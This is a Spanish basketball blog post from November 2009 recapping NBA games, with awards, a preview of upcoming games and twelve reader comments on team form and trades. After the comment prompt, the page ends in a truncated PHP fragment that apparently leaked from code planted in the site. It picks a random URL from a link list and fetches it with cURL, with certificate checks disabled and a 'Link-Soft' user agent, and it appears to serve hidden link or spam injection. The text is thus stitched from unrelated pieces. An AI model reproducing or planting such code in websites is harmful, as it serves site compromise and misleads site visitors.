La Crónica (03/11/2009)

04 de November de 2009 por TheDeerHunter

Espectacular festín de baloncesto el de anoche. La jornada lo tuvo todo: Emoción, grandes actuaciones individuales y colectivas, sorpresas y decepciones…

Por orden cronológico, los primeros en entrar en escena fueron los Cavs en su “clásico” contra los Wizards. Con LeBron en su línea, Shaq aportando y formando rocosa pareja con Varejao más los “picotazos” de Mo y Gibson, los locales no dieron lugar a la sorpresa. Los Wizards plantaron cara sin excesiva convicción, sobre todo al principio, pero se fueron apagando conforme fue avanzando el choque.

Simultáneamente los Nuggets firmaban el mejor arranque en 24 años ante el experto público del Conseco Field House. Carmelo aflojó un pistón en su nivel de MVP, pero estuvo perfectamente arropado por los Billups, Nenê y el banquillo, en especial Arron Afflalo. Indiana estuvo horrible en el tiro y sólo podemos salvar de la quema a Dahntay Jones, inusualmente bien.

Los Celtics se presentaron en el Wachovia de Philadelphia con aureola de “coco” y se confirma que dan miedo, mucho miedo. Si el año pasado dejamos atrás el tópico del “Big Three”, ahora ya no sabemos como les podríamos calificar. “Big diez”, “Big doce” o algo así. 40 puntos de diferencia, en un escenario hostil como éste, dejando en 74 puntos a un buen equipo como los Sixers. Más miedo si añadimos que Allen o Garnett apenas intervinieron más allá del intangible. Cualquier calificativo se quedaría corto.

Los Magic, en cambio, se dejaron una porción de su crédito en el Palace de Auburn. Los Pistons y los árbitros lograron sacar de sus casillas a Howard, que no llegó a disputar ni 20 minutos por problemas de faltas. Decepcionante la pareja Gortat-Bass a la hora de cubrir su ausencia y, sin su hombre grande, Ryan Anderson se hizo menos peligroso. En río revuelto, Ben Gordon marcó la diferencia, con Will Bynum y Stuckey ametrallando la canasta sin cortarse un pelo. Vince Carter volvió a jugar tras su lesión pero lo hizo bastante mermado.

Otros que perdieron la imbatibilidad fueron los Heat ante unos Suns enrachados y un Nash en “MVP mode”. Es Wade quien todavía no ha terminado de despertar esta campaña.

Los Bulls le vieron las orejas al lobo en forma del rookie Brandon Jennings, que le hizo sudar las de Caín al mismísimo Derrick Rose. Fue Luol Deng quien amarró la victoria. Va de aleros reboteadores la cosa… Ayer Gerald Wallace y hoy el británico. 20 rebotacos, más 24 puntos para ganar por 3 puntetes.

Más apretada todavía estuvo la victoria de los Lakers en Oklahoma. Prórroga y balones a Kobe, como en la era pre-Gasol. Pertenecer al banco de L.A. debe de ser uno de los trabajos más agradecidos del mundo. Ganar mucho (económica y deportivamente) y sudar poco.  Anoche entre 7 tipos se repartieron 6 puntos en 40 minutos de juego que les tocó en suerte. Son 20 millones de dólares que a más de uno nos iría bien, aunque aportáramos algo (no puede ser mucho) menos. Vujacic es el nuevo ídolo angelino del “Cacito Powa” y Farmar&Morrison ni aunque les flagelen públicamente reaccionan. Los Thunder jugaron bien, pero les faltó acierto exterior. Durant 28 puntos pero 0-8 en triples. Los campeones se escaparon vivos. Igualito que los Celtics.

Por último, Nowitzki destrozó a los Jazz con la inestimable ayuda de un acertado Kidd y los Blazers volvieron a palmar en el Rose ante Atlanta. Ya están en negativo, pero ya es difícil que en adelante lo hagan peor que anoche. Podría ser un consuelo.

PREMIOS

MVP: Muy destacables los 30 puntos (11 de 15 en tiro) y 8 asistencias de Steve Nash o los 24 puntos y 20 rebotes de Luol Deng (actuación clavada a la de Gerald Wallace de ayer) pero el premio se lo lleva el gran Dirk Nowitzki.  40 puntos, 11 rebotes, 5 asistencias, 2 robos y 5 tapones (52 puntos de eficiencia), con 29 puntos en el último cuarto, nuevo récord de la franquicia, que sirvieron para completar una espectacular remontada y lograr la victoria.

Rookie: Brandon Jennings parece el jefe del cotarro en Milwaukee en ausencia de Michael Redd como atestiguan los 23 tiros que ha lanzado hoy para conseguir 25 puntos.

Sorpresa: Buenas actuaciones de 3 no habituales como Arron Afflalo, Shelden Williams y Dahntay Jones y partidazo de Jamal Crawford que se encuentra feliz en su nuevo equipo y su nuevo rol como atestiguan los 27 puntos y 7 asistencias logrados en el partido de hoy frente los Blazers.

Decepción: Para 3 jugadores que pueden encontrarse en la final de conferencia del Este. Por un lado el binomio Garnett-Allen que ha anotado 8 puntos con un 3 de 15 en tiros de campo entre ambos. Y por el otro Dwight Howard, eliminado a los 16 minutos con 6 faltas personales totalmente desquiciado con solamente 8 puntos y 5 rebotes.

Esfuerzo en vano: No acaban de funcionar las cosas en Portland y hoy han sumado una nueva derrota a pesar de los 20 puntos y 14 rebotes de Lamarcus Aldridge.

RAZONES PARA TRASNOCHAR

A priori los duelos más destacados de esta madrugada serán los que enfrenten a Phoenix (aún invicto) con Orlando a partir de la 1h00 y Dallas con New Orleans a partir de las 3h30. Pero la verdad es que hay platos para todos los gustos: Los que tengan ganas de ver más que probables palizas no pueden perderse el Boston-Minnesota (2h00) ni el Denver-New Jersey (1h30). Si esperas partidos algo más igualados lo mejor es sentarse a ver el Detroit-Toronto (1h00) o el Miami-Wizards (1h00) con un enfrentamiento Wade-Arenas que seguro será espectacular. A los que les vaya el morbo no pueden perderse el primer partido de Trevor Ariza contra su ex-equipo (2h30). Y para los ni fú ni fa siempre quedan un Atlanta-Sacramento (4h00), un Indiana-New York (1h30) o un Memphis-Golden State (4h30). ¿Saldrá Iverson de titular?

Comenta

12 comentarios a esta entrada

  1. sergio dice:
    #1

    BOS@PHI: Boston jugando como campeones. Philly aguantando mas o menos el tipo hasta el ultimo cuarto. Da cierta risa comparar la produccion del banquillo en LA y hacerlo con Boston u Orlando. Malos partidos de Garnett y Allen pero nadie se acordara de ello mañana.

    WAS@CLE: Cuando a LeBron le apoyan 2 o 3 jugadores es practicamente una victoria asegurada. Y mas contra Washington (a pesar de que tengan mejor balance es algo accidental) Buen partido Butler y Arenas. Tengo muchas ganas de que vuelva Antawn Jamison para ver el potencial de los capitalinos.

    DEN@IND: Buen partido de los de siempre: Hilario, Carmelo y Billups. Afflalo discutiendole el puesto a Carter (supongo que se lo llevaria si no fuera porque Billups a veces parece hacer de escolta). Mal partido en tiro de 3 de Granger y Hibbert mejorando cada dia (4 chapitas, de ellas 3 a Hilario)

    ORL@DET: Partido extraño. Howard contra Ben Wallace en el geriatrico y “muñecadeoro” K.Brown y va y dura 16 minutos en pista… este era su partido de 30-20. Magnifico partido de los exteriores de los Pistons. Stuckey y Bynum no dejaron jugar a Nelson y ahi se acabo el partido.

    PHO@MIA: Wade en su linea, Jermaine vuelve a ser normal, Beasley no sabe que tiene compañeros y Haslem haciendo el trabajo sucio. Nash no entiende de edad. Frye ha dejado ser Nowitzki y preocupante disminucion de puntos de Amare (juega lo mismo y ha bajado casi 4 puntos)

    MIL@CHI: Jennings mejor que Gordon?? Sera mejor de lo que pensabamos el joven base? Lo dudo. Partidazo por fin de Loul Deng

    LAL@OKC: Siguen echando de menos a Pau. 46 minutos entre los 8 suplentes para 6 puntos, 4 rebotes y 2 asistencias. 6 faltas personales, 2 perdidas y dos tapones recibidos….. ¬¬. Buen partido de Durante a pesar del 0-8 en triples.

    UTA@DAL: Nowitzki MVP!! el 29 puntos en el ultimo cuarto y los Jazz 18. Sloan se tira de los pelos pero hay que reconocer que como tenga el dia Dirk…. Kidd 7 perdidas. ¿La experiencia es un grado?

    ATL@POR: Fuera McMillan por Dio´h! Ayer Miller y Blake no acertaban una pero es que Miller hizo 11 asistencias en el mismo tiempo (en cuanto a +/- ganaban con Blake en pista todo hay que decirlo) Menos Outlaw, Aldridge y Roy para meterlos en la hoguera con McMillan.

      Citar

  2. MagicJohnson32 dice:
    #2

    El LAL@OKC fue un partido feo. Bueno, más que feo, duro, trabado, intenso, un terreno en que los Thunder se sienten cómodos. Por cierto, cómo han mejorado en defensa los chavalines. Durant, Jeff Green, Westbrook, Sefolosha… tienen el potencial físico para defender muy bien y ya empiezan a hacerlo. Por cierto, vi realmente bien a Etan Thomas, muchísimo mejor que Krstic.

    Los Lakers notan más de la cuenta la ausencia de Pau por lo que comenta Sergio, la bajísima forma del banquillo. Odom, que está bastante bien y ha empezado en mejor forma que en los últimos años, debería salir de 6º hombre para revitalizar una rotación que ahora mismo es un agujero.

      Citar

  3. Love Denise dice:
    #3

    ¡¡ Tremendo Nash ¡¡¡¡ hoy se ha meado en toda la cara de Chalmers, y yo que pensaba que el canadiense ya estaba acabado.
    Respecto a lo que comenta magicjohnson 32 sobre el banquillo angelino, yo no creo que los del banquillo esté en baja forma, es que son así de malos (excepto Odom), los Lakers están fiando sus opciones en 6 tios, y cómo uno o dos de éstos fallen en playoffs (ya sea por lesión o por baja forma), se acabaran los Lakers, siendo devorados entonces por Magic, Celtics, Cavs o Spurs.

    En cuanto a lo de Blake titular, ufff, creo que no hace falta comentar nada. Todo el mundo conoce quien es Blake y hasta dónde es capaz de llegar, y quien es Andre Miller y que es lo que puede hacer.

      Citar

  4. sergio dice:
    #4

    Quizas no estaria mal pensar en un trade para conseguir un base-escolta en condiciones para el banquillo. Quizas los Warriors que tienen sobrepoblacion de escoltas/falsos bases como le gustan a Jackson sean un buen cliente.

    Si juntas a dos entre Vujacic, Farmar, Powell/Mbenga, Morrison quizas consigas algo interesante. Maggete/Jackson/Ellis podrian servir.

      Citar

  5. Viva_Dirk dice:
    #5

    Joder que si podria servir, ya atracamos a los Grizzlies, dudo mucho que los Warriors quieran nada de eso, salvo el expiring de Morrison.

      Citar

  6. sergio dice:
    #6

    Quizas quieran coger limite salarial para el año que viene,,, quien sabe

      Citar

  7. Love Denise dice:
    #7

    segun hoopsype, tanto a Jackson, Ellis y Magette le quedan como 35-40 millones € de contrato, por lo que no se si sería peor el remedio (alguno de estos 3) que la enfermedad (Vujacic, Walton, Morrison).

    Me parece a mi que los angelinos van a tener que comerse los contratazos de estos 3, a no ser que los Grizzlies u otro equipo perdedor nos sorprendan con algun regalo.

      Citar

  8. sergio dice:
    #8

    De hecho el que menos cobra es Jackson… unos 7 kilitos al año (eso si… se incrementan mucho). Pero es que Vujacic esta en 5 y termina en 2010. Farmar 2,5 tambien expiring con opcion de igualar (lo mismo que le pasa a Morrison y sus 5 largos). Powell y Mbenga son expiring pero solo de 1 kilito…. algo se podra hacer con eso no??

    Tambien pueden valer gente como Barea, Nick Young, Lowry, Brooks, Will Bynum, Louis Williams, Conley, Antonio Daniels o ¡hasta Steve Blake! y asi le quitamos las tonterias a McMillan y solo puede poner a Miller

      Citar

  9. Vader dice:
    #9

    Bueno al final los ositos se llevaron a Gasol “pequeño” en el trade lo que a la larga no se si resultará un buen negocio…

    Memphis tendria que apostar por Mayo+Gasol como jugadores franquicia y rodearlos de jornaleros de calidad. En vez de ello les traen “estrellitas” venidas a menos que frenan el desarrollo de estos jugadores… en fin…

      Citar

  10. Viva_Dirk dice:
    #10

    Sergio, no creo que halla posibilidades reales de traer a ninguno de esos, mas aun metiendo el contratito de Vujacic. Antonio Daniels ya sonó hace un par de años como agente libre, y creo que no mejoraría casi nada el banco.

    A mi no me preocupa demasiado, estoy seguro de que tanto Walton como Shannon Brown van a rendir bien cuando les toque. Y a Morrison de momento no se le ha dado ni un minuto.

      Citar

  11. sergio dice:
    #11

    Yo de esos dos no dudo… dudo del resto

      Citar

  12. Óscar dice:
    #12

    Mal inicio de los Blazers, no tanto por el récord (2-3) como por las sensaciones. El año pasado empezamos 1-3 (luego 8-6, para un 15-7), logrando al final 54 victorias.
    A McMillan no le ha debido gustar nada la baja de Batum, lo tenía todo atadito y como decíamos tras la exhibición de Carmelo y Ariza, los “treses” rivales están haciedo trizas a Portland, excepto Durant. Algo falla en defensa. Y el 1-2 en casa si que no me lo esperaba.
    El inicio de LaMarcus Aldridge, pese al golpe en la rodilla, está siendo decepcionante justo cuando tenía que dar un paso adelante, tras firmar la extensión. Pensar en All-Star a día de hoy es una quimera, pero esto no ha hecho más que empezar. Aunque el viernes visitan los Spurs el Rose Garden…
    GO BLAZERS !!!!
    P.D. Esa calvita de Manu Ginobili no es nueva, lleva con ella al menos un par de añitos, pero no le va a más… Tras cazar al vuelo al murciélago, por lo visto se ha tenido que vacunar con no sé que historias porque el bicho parece que le mordió… Qué grande el Manu…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>